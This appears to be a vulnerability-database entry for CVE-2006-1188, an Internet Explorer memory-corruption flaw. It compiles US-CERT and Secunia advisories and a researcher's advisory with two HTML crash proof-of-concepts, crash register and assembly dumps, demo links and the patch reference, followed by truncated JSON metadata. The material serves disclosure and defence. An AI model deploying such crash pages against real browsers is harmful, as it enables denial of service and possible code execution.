var-200604-0201
Vulnerability from variot
Microsoft Internet Explorer 5.01 through 6 allows remote attackers to execute arbitrary code via HTML elements with a certain crafted tag, which leads to memory corruption. ------------ This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. Microsoft Windows fails to properly handle COM Objects. This vulnerability may allow a remote unauthenticated attacker to execute arbitrary code on a vulnerable system. Microsoft Internet Explorer (IE) will attempt to use COM objects that were not intended to be used in the web browser. This can cause a variety of impacts, such as causing IE to crash. This is related to the handling of certain HTML tags. They could also use HTML email for the attack. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
National Cyber Alert System
Technical Cyber Security Alert TA06-101A
Microsoft Windows and Internet Explorer Vulnerabilities
Original release date: April 11, 2006 Last revised: -- Source: US-CERT
Systems Affected
* Microsoft Windows
* Microsoft Internet Explorer
For more complete information, refer to the Microsoft Security Bulletin Summary for April 2006.
I. (CVE-2006-0012)
II. If the user is logged on with administrative privileges, the attacker could take complete control of an affected system. An attacker may also be able to cause a denial of service.
III. Solution
Apply Updates
Microsoft has provided updates for these vulnerabilities in the Security Bulletins and on the Microsoft Update site.
Workarounds
Please see the US-CERT Vulnerability Notes for workarounds. Many of these vulnerabilities can be mitigated by following the instructions listed in the Securing Your Web Browser document.
Appendix A. Please send email to cert@cert.org with "TA06-101A Feedback VU#876678" in the subject.
For instructions on subscribing to or unsubscribing from this mailing list, visit http://www.us-cert.gov/cas/signup.html.
Produced 2006 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
Revision History
Apr 11, 2006: Initial release
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux)
iQEVAwUBRDwj9n0pj593lg50AQInJggAoOBNa20SU8JukBoK5elr5vWOLcAjycHt Cg0+064ncCpQXoWiYPrLGVzg4/MCTVUygbYl85cePp5cHSHqpfuYXoBuZwSKu36+ olQdkbU1ejViA8A0XPsQ3EgtIRlDZSgL1ncYlRM8QxK8CF7QV616ta8q6H/3EDMM i+tXy6gzQMqJeUthopzGcfpf6U5Qu9PCk/+Pj66GfFhHpARanLef2H28WFRazC+I R+vLGLFLV0gp1Iy7t267l1BhN1w1z+fXD0WwYkiTwb0mzeize8Amdqlb5c4Vn4wh HAF/XGiCe5qkMhM7kRLA70JsNfSkI38JPHWSo9/a04wFBKENCAwNpA== =w6IC -----END PGP SIGNATURE----- .
Bist Du interessiert an einem neuen Job in IT-Sicherheit?
Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT- Sicherheit: http://secunia.com/secunia_vacancies/
TITLE: Internet Explorer "javaprxy.dll" Memory Corruption Vulnerability
SECUNIA ADVISORY ID: SA15891
VERIFY ADVISORY: http://secunia.com/advisories/15891/
CRITICAL: Highly critical
IMPACT: DoS, System access
WHERE:
From remote
SOFTWARE: Microsoft Internet Explorer 6.x http://secunia.com/product/11/ Microsoft Internet Explorer 5.5 http://secunia.com/product/10/ Microsoft Internet Explorer 5.01 http://secunia.com/product/9/
DESCRIPTION: SEC Consult has reported a vulnerability in Microsoft Internet Explorer, which potentially can be exploited by malicious people to compromise a user's system. This can be exploited via a malicious web site to cause a memory corruption.
The vulnerability has been reported in versions 5.01, 5.5, and 6.0.
SOLUTION: The vendor recommends setting Internet and Local intranet security zone settings to "High".
PROVIDED AND/OR DISCOVERED BY: sk0L and Martin Eiszner, SEC Consult.
ORIGINAL ADVISORY: Microsoft: http://www.microsoft.com/technet/security/advisory/903144.mspx
SEC Consult: http://www.sec-consult.com/184.html
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
.
Visit http://www.microsoft.com/windows/ie/default.mspx or http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.
o Memory Corruption Vulnerability: #7d519030
Following HTML code forces IE 6 to crash:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
</h6 </ul
Online-demo: http://morph3us.org/security/pen-testing/msie/ie60-1135035582812-7d519030.html
These are the register values and the ASM dump at the time of the access violation:
eax=00000000 ebx=0012e88c ecx=00000000 edx=0012e7c0 esi=00000000 edi=00000004 eip=7d519030 esp=0012e780 ebp=0012e894
7d519012 55 push ebp 7d519013 8bec mov ebp,esp 7d519015 8b4104 mov eax,[ecx+0x4] 7d519018 394508 cmp [ebp+0x8],eax 7d51901b 7c09 jl mshtml+0x69026 (7d519026) 7d51901d 7edc jle mshtml+0x68ffb (7d518ffb) 7d51901f 33c0 xor eax,eax 7d519021 40 inc eax 7d519022 5d pop ebp 7d519023 c20800 ret 0x8 7d519026 83c8ff or eax,0xffffffff 7d519029 ebf7 jmp mshtml+0x69022 (7d519022) 7d51902b 90 nop 7d51902c 90 nop 7d51902d 90 nop 7d51902e 90 nop 7d51902f 90 nop
FAULT ->7d519030 8b4108 mov eax,[ecx+0x8] ds:0023:00000008=???????? 7d519033 85c0 test eax,eax 7d519035 7425 jz mshtml+0x6905c (7d51905c) 7d519037 8b10 mov edx,[eax] 7d519039 f6c210 test dl,0x10 7d51903c 7408 jz mshtml+0x69046 (7d519046) 7d51903e f6c220 test dl,0x20 7d519041 7519 jnz mshtml+0x6905c (7d51905c) 7d519043 8b400c mov eax,[eax+0xc] 7d519046 8b4808 mov ecx,[eax+0x8] 7d519049 85c9 test ecx,ecx
o Memory Corruption Vulnerability: #7d529d35
Following HTML code forces IE 6 to crash:
Show details on source website<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
</code
</style </td </label </bdo </th </object
Online-demo: http://morph3us.org/security/pen-testing/msie/ie60-1135042070015-7d529d35.html
These are the register values and the ASM dump at the time of the access violation:
eax=00000000 ebx=0012e88c ecx=00000000 edx=00000012 esi=00e7dbb0 edi=00000002 eip=7d529d35 esp=0012e778 ebp=0012e778
7d529d0e e811170000 call mshtml+0x7b424 (7d52b424) 7d529d13 85c0 test eax,eax 7d529d15 0f85c5500800 jne mshtml!DllGetClassObject+0x10fa2 (7d5aede0) 7d529d1b 0fb65508 movzx edx,byte ptr [ebp+0x8] 7d529d1f 8d849680000000 lea eax,[esi+edx*4+0x80] 7d529d26 5e pop esi 7d529d27 5d pop ebp 7d529d28 c20c00 ret 0xc 7d529d2b 90 nop 7d529d2c 90 nop 7d529d2d 90 nop 7d529d2e 90 nop 7d529d2f 90 nop 7d529d30 8bff mov edi,edi 7d529d32 55 push ebp 7d529d33 8bec mov ebp,esp
FAULT ->7d529d35 0fbe4114 movsx eax,byte ptr [ecx+0x14] ds:0023:00000014=?? 7d529d39 c1e004 shl eax,0x4 7d529d3c 0578aa4b7d add eax,0x7d4baa78 7d529d41 7410 jz mshtml+0x79d53 (7d529d53) 7d529d43 8b400c mov eax,[eax+0xc] 7d529d46 234508 and eax,[ebp+0x8] 7d529d49 f7d8 neg eax 7d529d4b 1bc0 sbb eax,eax 7d529d4d f7d8 neg eax 7d529d4f 5d pop ebp 7d529d50 c20400 ret 0x4 7d529d53 33c0 xor eax,eax 7d529d55 ebf8 jmp mshtml+0x79d4f (7d529d4f)
o Vulnerable versions:
The DoS vulnerability was successfully tested on:
MS IE 6 SP2 - Win XP Pro SP2 MS IE 6 - Win 2k SP4
o Disclosure Timeline:
xx Feb 06 - Vulnerabilities discovered. 08 Mar 06 - Vendor contacted. 22 Mar 06 - Vendor confirmed vulnerabilities. 25 May 06 - Public release.
o Solution:
Install the latest security update (MS06-013) for Internet Explorer [2].
o Credits:
Thomas Waldegger bugtraq@morph3us.org BuHa-Security Community - http://buha.info/board/
If you have questions, suggestions or criticism about the advisory feel free to send me a mail. The address 'bugtraq@morph3us.org' is more a spam address than a regular mail address therefore it's possible that some mails get ignored. Please use the contact details at http://morph3us.org/ to contact me.
Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all members of BuHa
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-200604-0201", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": null, "scope": null, "trust": 7.2, "vendor": "microsoft", "version": null }, { "model": "internet explorer", "scope": "eq", "trust": 1.3, "vendor": "microsoft", "version": "6.0" }, { "model": "ie", "scope": "eq", "trust": 1.0, "vendor": "microsoft", "version": "5.2.3" }, { "model": "internet explorer", "scope": "eq", "trust": 1.0, "vendor": "microsoft", "version": "5.1" }, { "model": "internet explorer", "scope": "eq", "trust": 1.0, "vendor": "microsoft", "version": "5.5" }, { "model": "internet explorer", "scope": "eq", "trust": 1.0, "vendor": "microsoft", "version": "6.0.2800.1106" }, { "model": "ie", "scope": "eq", "trust": 1.0, "vendor": "microsoft", "version": "6" }, { "model": "internet explorer", "scope": "eq", "trust": 1.0, "vendor": "microsoft", "version": "6.0.2600" }, { "model": "internet explorer", "scope": "eq", "trust": 1.0, "vendor": "microsoft", "version": "6.0.2900.2180" }, { "model": "ie", "scope": "eq", "trust": 1.0, "vendor": "microsoft", "version": "6.0" }, { "model": "ie", "scope": "eq", "trust": 1.0, "vendor": "microsoft", "version": "5.1" }, { "model": "internet explorer", "scope": "eq", "trust": 1.0, "vendor": "microsoft", "version": "6.0.2800" }, { "model": "internet explorer", "scope": "eq", "trust": 1.0, "vendor": "microsoft", "version": "6" }, { "model": "network camera server vb101", "scope": "eq", "trust": 1.0, "vendor": "canon", "version": "*" }, { "model": "windows server 2003", "scope": "eq", "trust": 0.8, "vendor": "microsoft", "version": "none" }, { "model": "windows server 2003", "scope": "eq", "trust": 0.8, "vendor": "microsoft", "version": "(itanium)" }, { "model": "windows server 2003", "scope": "eq", "trust": 0.8, "vendor": "microsoft", "version": "(x64)" }, { "model": "windows xp", "scope": "eq", "trust": 0.8, "vendor": "microsoft", "version": "(x64)" }, { "model": "windows xp", "scope": "eq", "trust": 0.8, "vendor": "microsoft", "version": "sp3" }, { "model": "ie", "scope": "eq", "trust": 0.6, "vendor": "microsoft", "version": "6.0.2800.1106" }, { "model": "ie", "scope": "eq", "trust": 0.6, "vendor": "microsoft", "version": "6.0.2900.2180" }, { "model": "ie", "scope": "eq", "trust": 0.6, "vendor": "microsoft", "version": "6.0.2800" }, { "model": "internet explorer sp1", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "6.0" } ], "sources": [ { "db": "CERT/CC", "id": "VU#234812" }, { "db": "CERT/CC", "id": "VU#876678" }, { "db": "CERT/CC", "id": "VU#680526" }, { "db": "CERT/CC", "id": "VU#824324" }, { "db": "CERT/CC", "id": "VU#641460" }, { "db": "CERT/CC", "id": "VU#341028" }, { "db": "CERT/CC", "id": "VU#434641" }, { "db": "CERT/CC", "id": "VU#740372" }, { "db": "CERT/CC", "id": "VU#939605" }, { "db": "BID", "id": "17468" }, { "db": "JVNDB", "id": "JVNDB-2006-000174" }, { "db": "CNNVD", "id": "CNNVD-200604-164" }, { "db": "NVD", "id": "CVE-2006-1188" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/o:microsoft:windows_server_2003", "vulnerable": true }, { "cpe22Uri": "cpe:/o:microsoft:windows_xp", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2006-000174" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Thomas Waldegger\u203b bugtraq@morph3us.org", "sources": [ { "db": "CNNVD", "id": "CNNVD-200604-164" } ], "trust": 0.6 }, "cve": "CVE-2006-1188", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2006-1188", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-17296", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2006-1188", "trust": 1.0, "value": "HIGH" }, { "author": "CARNEGIE MELLON", "id": "VU#876678", "trust": 0.8, "value": "35.63" }, { "author": "CARNEGIE MELLON", "id": "VU#680526", "trust": 0.8, "value": "28.35" }, { "author": "CARNEGIE MELLON", "id": "VU#984473", "trust": 0.8, "value": "23.01" }, { "author": "CARNEGIE MELLON", "id": "VU#824324", "trust": 0.8, "value": "13.77" }, { "author": "CARNEGIE MELLON", "id": "VU#641460", "trust": 0.8, "value": "27.00" }, { "author": "CARNEGIE MELLON", "id": "VU#341028", "trust": 0.8, "value": "32.40" }, { "author": "CARNEGIE MELLON", "id": "VU#434641", "trust": 0.8, "value": "25.50" }, { "author": "CARNEGIE MELLON", "id": "VU#740372", "trust": 0.8, "value": "10.13" }, { "author": "CARNEGIE MELLON", "id": "VU#939605", "trust": 0.8, "value": "44.55" }, { "author": "NVD", "id": "CVE-2006-1188", "trust": 0.8, "value": "High" }, { "author": "CNNVD", "id": "CNNVD-200604-164", "trust": 0.6, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-17296", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "CERT/CC", "id": "VU#876678" }, { "db": "CERT/CC", "id": "VU#680526" }, { "db": "CERT/CC", "id": "VU#984473" }, { "db": "CERT/CC", "id": "VU#824324" }, { "db": "CERT/CC", "id": "VU#641460" }, { "db": "CERT/CC", "id": "VU#341028" }, { "db": "CERT/CC", "id": "VU#434641" }, { "db": "CERT/CC", "id": "VU#740372" }, { "db": "CERT/CC", "id": "VU#939605" }, { "db": "VULHUB", "id": "VHN-17296" }, { "db": "JVNDB", "id": "JVNDB-2006-000174" }, { "db": "CNNVD", "id": "CNNVD-200604-164" }, { "db": "NVD", "id": "CVE-2006-1188" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Microsoft Internet Explorer 5.01 through 6 allows remote attackers to execute arbitrary code via HTML elements with a certain crafted tag, which leads to memory corruption. ------------ This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. Microsoft Windows fails to properly handle COM Objects. This vulnerability may allow a remote unauthenticated attacker to execute arbitrary code on a vulnerable system. Microsoft Internet Explorer (IE) will attempt to use COM objects that were not intended to be used in the web browser. This can cause a variety of impacts, such as causing IE to crash. This is related to the handling of certain HTML tags. They could also use HTML email for the attack. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\n\n National Cyber Alert System\n\n Technical Cyber Security Alert TA06-101A\n\n\nMicrosoft Windows and Internet Explorer Vulnerabilities\n\n Original release date: April 11, 2006\n Last revised: --\n Source: US-CERT\n\n\nSystems Affected\n\n * Microsoft Windows\n * Microsoft Internet Explorer\n\n For more complete information, refer to the Microsoft Security\n Bulletin Summary for April 2006. \n\n\nI. \n (CVE-2006-0012)\n\n\nII. If the user is logged on with\n administrative privileges, the attacker could take complete control of\n an affected system. An attacker may also be able to cause a denial of\n service. \n\n\nIII. Solution\n\nApply Updates\n\n Microsoft has provided updates for these vulnerabilities in the\n Security Bulletins and on the Microsoft Update site. \n\nWorkarounds\n\n Please see the US-CERT Vulnerability Notes for workarounds. Many of\n these vulnerabilities can be mitigated by following the instructions\n listed in the Securing Your Web Browser document. \n\nAppendix A. Please send\n email to \u003ccert@cert.org\u003e with \"TA06-101A Feedback VU#876678\" in the\n subject. \n ____________________________________________________________________\n\n For instructions on subscribing to or unsubscribing from this\n mailing list, visit \u003chttp://www.us-cert.gov/cas/signup.html\u003e. \n ____________________________________________________________________\n\n Produced 2006 by US-CERT, a government organization. \n\n Terms of use:\n\n \u003chttp://www.us-cert.gov/legal.html\u003e\n ____________________________________________________________________\n\n\nRevision History\n\n Apr 11, 2006: Initial release\n\n\n\n\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.2.1 (GNU/Linux)\n\niQEVAwUBRDwj9n0pj593lg50AQInJggAoOBNa20SU8JukBoK5elr5vWOLcAjycHt\nCg0+064ncCpQXoWiYPrLGVzg4/MCTVUygbYl85cePp5cHSHqpfuYXoBuZwSKu36+\nolQdkbU1ejViA8A0XPsQ3EgtIRlDZSgL1ncYlRM8QxK8CF7QV616ta8q6H/3EDMM\ni+tXy6gzQMqJeUthopzGcfpf6U5Qu9PCk/+Pj66GfFhHpARanLef2H28WFRazC+I\nR+vLGLFLV0gp1Iy7t267l1BhN1w1z+fXD0WwYkiTwb0mzeize8Amdqlb5c4Vn4wh\nHAF/XGiCe5qkMhM7kRLA70JsNfSkI38JPHWSo9/a04wFBKENCAwNpA==\n=w6IC\n-----END PGP SIGNATURE-----\n. \n\n----------------------------------------------------------------------\n\nBist Du interessiert an einem neuen Job in IT-Sicherheit?\n\n\nSecunia hat zwei freie Stellen als Junior und Senior Spezialist in IT-\nSicherheit:\nhttp://secunia.com/secunia_vacancies/\n\n----------------------------------------------------------------------\n\nTITLE:\nInternet Explorer \"javaprxy.dll\" Memory Corruption Vulnerability\n\nSECUNIA ADVISORY ID:\nSA15891\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/15891/\n\nCRITICAL:\nHighly critical\n\nIMPACT:\nDoS, System access\n\nWHERE:\n\u003eFrom remote\n\nSOFTWARE:\nMicrosoft Internet Explorer 6.x\nhttp://secunia.com/product/11/\nMicrosoft Internet Explorer 5.5\nhttp://secunia.com/product/10/\nMicrosoft Internet Explorer 5.01\nhttp://secunia.com/product/9/\n\nDESCRIPTION:\nSEC Consult has reported a vulnerability in Microsoft Internet\nExplorer, which potentially can be exploited by malicious people to\ncompromise a user\u0027s system. \nThis can be exploited via a malicious web site to cause a memory\ncorruption. \n\nThe vulnerability has been reported in versions 5.01, 5.5, and 6.0. \n\nSOLUTION:\nThe vendor recommends setting Internet and Local intranet security\nzone settings to \"High\". \n\nPROVIDED AND/OR DISCOVERED BY:\nsk0L and Martin Eiszner, SEC Consult. \n\nORIGINAL ADVISORY:\nMicrosoft:\nhttp://www.microsoft.com/technet/security/advisory/903144.mspx\n\nSEC Consult:\nhttp://www.sec-consult.com/184.html\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. \n\nVisit http://www.microsoft.com/windows/ie/default.mspx or\nhttp://en.wikipedia.org/wiki/Internet_Explorer for detailed information. \n\no Memory Corruption Vulnerability: \u003cmshtml.dll\u003e#7d519030\n=================================\n\nFollowing HTML code forces IE 6 to crash:\n\u003e \u003c!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\"\n\u003e \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\"\u003e\n\u003e \u003chtml\u003e \u003cfieldset\u003e \u003ch4\u003e\n\u003e \u003cpre\u003e\u003ctd\u003e\n\u003e \u003cmenu\u003e\n\u003e \u003clegend\u003e\n\u003e \u003ca\u003e\n\u003e \u003cul\u003e\n\u003e \u003csmall\u003e\n\u003e \u003cfieldset\u003e\n\u003e \u003ch6\u003e\n\u003e \u003c/h6\n\u003e \u003c/u\u003e\n\u003e \u003c/optgroup\u003e\n\u003e \u003c/tr\u003e\n\u003e \u003c/map\u003e\n\u003e \u003c/ul\n\u003e \u003c/dfn\u003e\n\u003e\n\u003e \u003c/del\u003e\n\u003e \u003c/h2\u003e\n\u003e \u003c/dir\u003e\n\u003e \u003c/ul\u003e\n\nOnline-demo:\nhttp://morph3us.org/security/pen-testing/msie/ie60-1135035582812-7d519030.html\n\nThese are the register values and the ASM dump at the time of the access\nviolation:\n\u003e eax=00000000 ebx=0012e88c ecx=00000000 edx=0012e7c0 esi=00000000\n\u003e edi=00000004 eip=7d519030 esp=0012e780 ebp=0012e894\n\u003e\n\u003e 7d519012 55 push ebp\n\u003e 7d519013 8bec mov ebp,esp\n\u003e 7d519015 8b4104 mov eax,[ecx+0x4]\n\u003e 7d519018 394508 cmp [ebp+0x8],eax\n\u003e 7d51901b 7c09 jl mshtml+0x69026 (7d519026)\n\u003e 7d51901d 7edc jle mshtml+0x68ffb (7d518ffb)\n\u003e 7d51901f 33c0 xor eax,eax\n\u003e 7d519021 40 inc eax\n\u003e 7d519022 5d pop ebp\n\u003e 7d519023 c20800 ret 0x8\n\u003e 7d519026 83c8ff or eax,0xffffffff\n\u003e 7d519029 ebf7 jmp mshtml+0x69022 (7d519022)\n\u003e 7d51902b 90 nop\n\u003e 7d51902c 90 nop\n\u003e 7d51902d 90 nop\n\u003e 7d51902e 90 nop\n\u003e 7d51902f 90 nop\n\u003e FAULT -\u003e7d519030 8b4108 mov eax,[ecx+0x8]\n\u003e ds:0023:00000008=????????\n\u003e 7d519033 85c0 test eax,eax\n\u003e 7d519035 7425 jz mshtml+0x6905c (7d51905c)\n\u003e 7d519037 8b10 mov edx,[eax]\n\u003e 7d519039 f6c210 test dl,0x10\n\u003e 7d51903c 7408 jz mshtml+0x69046 (7d519046)\n\u003e 7d51903e f6c220 test dl,0x20\n\u003e 7d519041 7519 jnz mshtml+0x6905c (7d51905c)\n\u003e 7d519043 8b400c mov eax,[eax+0xc]\n\u003e 7d519046 8b4808 mov ecx,[eax+0x8]\n\u003e 7d519049 85c9 test ecx,ecx\n\no Memory Corruption Vulnerability: \u003cmshtml.dll\u003e#7d529d35\n=================================\n\nFollowing HTML code forces IE 6 to crash:\n\u003e \u003c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\u003e \"http://www.w3.org/TR/html4/loose.dtd\"\u003e\n\u003e \u003cbdo\u003e\n\u003e \u003c/span\u003e\n\u003e \u003cpre\u003e\n\u003e\n\u003e \u003cparam\u003e\n\u003e \u003cform\u003e\n\u003e \u003ccolgroup\u003e\n\u003e \u003csmall\u003e\n\u003e \u003c/small\u003e\n\u003e \u003c/colgroup\u003e\n\u003e \u003c/map\u003e\n\u003e \u003c/button\u003e\n\u003e \u003c/code\n\u003e\n\u003e \u003cblockquote\u003e\n\u003e \u003cth\u003e\n\u003e \u003csmall\u003e\n\u003e\n\u003e \u003c/tbody\u003e\n\u003e \u003c/tr\u003e\n\u003e \u003c/ol\u003e\n\u003e \u003c/tbody\u003e\n\u003e \u003c/ol\u003e\n\u003e \u003c/code\u003e\n\u003e \u003c/strong\u003e\n\u003e\n\u003e\n\u003e \u003chead\u003e\n\u003e \u003cfieldset\u003e\n\u003e \u003cstyle\u003e\n\u003e\n\u003e \u003c/style\n\u003e \u003c/dir\u003e\n\u003e \u003c/a\u003e\n\u003e \u003c/td\n\u003e \u003c/li\u003e\n\u003e \u003c/label\n\u003e \u003c/object\u003e\n\u003e \u003c/bdo\n\u003e \u003c/th\n\u003e \u003c/object\n\u003e \u003c/q\u003e\n\u003e\n\u003e \u003col\u003e\n\u003e \u003cobject\u003e\n\nOnline-demo:\nhttp://morph3us.org/security/pen-testing/msie/ie60-1135042070015-7d529d35.html\n\nThese are the register values and the ASM dump at the time of the access\nviolation:\n\u003e eax=00000000 ebx=0012e88c ecx=00000000 edx=00000012 esi=00e7dbb0\n\u003e edi=00000002 eip=7d529d35 esp=0012e778 ebp=0012e778\n\u003e\n\u003e 7d529d0e e811170000 call mshtml+0x7b424 (7d52b424)\n\u003e 7d529d13 85c0 test eax,eax\n\u003e 7d529d15 0f85c5500800 jne mshtml!DllGetClassObject+0x10fa2\n\u003e (7d5aede0)\n\u003e 7d529d1b 0fb65508 movzx edx,byte ptr [ebp+0x8]\n\u003e 7d529d1f 8d849680000000 lea eax,[esi+edx*4+0x80]\n\u003e 7d529d26 5e pop esi\n\u003e 7d529d27 5d pop ebp\n\u003e 7d529d28 c20c00 ret 0xc\n\u003e 7d529d2b 90 nop\n\u003e 7d529d2c 90 nop\n\u003e 7d529d2d 90 nop\n\u003e 7d529d2e 90 nop\n\u003e 7d529d2f 90 nop\n\u003e 7d529d30 8bff mov edi,edi\n\u003e 7d529d32 55 push ebp\n\u003e 7d529d33 8bec mov ebp,esp\n\u003e FAULT -\u003e7d529d35 0fbe4114 movsx eax,byte ptr [ecx+0x14]\n\u003e ds:0023:00000014=??\n\u003e 7d529d39 c1e004 shl eax,0x4\n\u003e 7d529d3c 0578aa4b7d add eax,0x7d4baa78\n\u003e 7d529d41 7410 jz mshtml+0x79d53 (7d529d53)\n\u003e 7d529d43 8b400c mov eax,[eax+0xc]\n\u003e 7d529d46 234508 and eax,[ebp+0x8]\n\u003e 7d529d49 f7d8 neg eax\n\u003e 7d529d4b 1bc0 sbb eax,eax\n\u003e 7d529d4d f7d8 neg eax\n\u003e 7d529d4f 5d pop ebp\n\u003e 7d529d50 c20400 ret 0x4\n\u003e 7d529d53 33c0 xor eax,eax\n\u003e 7d529d55 ebf8 jmp mshtml+0x79d4f (7d529d4f)\n\no Vulnerable versions:\n=====================\n\nThe DoS vulnerability was successfully tested on:\n\u003e MS IE 6 SP2 - Win XP Pro SP2\n\u003e MS IE 6 - Win 2k SP4\n\no Disclosure Timeline:\n=====================\n\nxx Feb 06 - Vulnerabilities discovered. \n08 Mar 06 - Vendor contacted. \n22 Mar 06 - Vendor confirmed vulnerabilities. \n25 May 06 - Public release. \n\no Solution:\n==========\n\nInstall the latest security update (MS06-013) for Internet Explorer [2]. \n\no Credits:\n=========\n\nThomas Waldegger \u003cbugtraq@morph3us.org\u003e\nBuHa-Security Community - http://buha.info/board/\n\nIf you have questions, suggestions or criticism about the advisory feel\nfree to send me a mail. The address \u0027bugtraq@morph3us.org\u0027 is more a\nspam address than a regular mail address therefore it\u0027s possible that\nsome mails get ignored. Please use the contact details at\nhttp://morph3us.org/ to contact me. \n\nGreets fly out to cyrus-tc, destructor, nait, rhy, trappy and all\nmembers of BuHa", "sources": [ { "db": "NVD", "id": 